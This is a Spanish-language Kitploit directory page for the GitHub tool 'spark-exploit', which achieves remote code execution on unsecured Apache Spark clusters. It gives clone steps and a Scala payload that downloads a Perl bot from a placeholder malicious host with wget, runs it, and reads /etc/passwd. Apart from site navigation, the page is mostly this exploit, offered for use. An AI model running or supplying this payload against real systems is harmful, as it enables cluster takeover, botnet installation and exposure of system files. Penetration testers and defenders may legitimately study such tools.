Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/akhld/spark-exploit
Seguridad de Infraestructura en la NubeExplotaciónPruebas de PenetraciónSeguridad en la NubeMala Configuración
GitHubakhld/spark-exploit

spark-exploit

Ejecución de Código Arbitrario en un Clúster Apache Spark no Asegurado

Ver Repositorio
84hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Ejecución de Código Arbitrario en un Clúster Apache Spark No Seguro

Cómo explotar

Sigue los siguientes pasos:

root@kitploit:~
* $ git clone https://github.com/akhld/spark-exploit.git
* $ cd spark-exploit

Ejecución Remota de Código

Abre exploit.scala y reemplaza el siguiente código con lo que quieras que se ejecute.

root@kitploit:~
val exploit = sc.parallelize(1 to 1).map(x=>{
           //Replace these with whatever you want to get executed
  	     val x = "wget https://mallicioushost/mal.pl -O bot.pl".!
           val y = "perl bot.pl".!
           scala.io.Source.fromFile("/etc/passwd").mkString
        })

PoC

https://hacked.work/blog/arbitary-code-execution-in-unsecured-apache-spark-cluster/

Descargar herramienta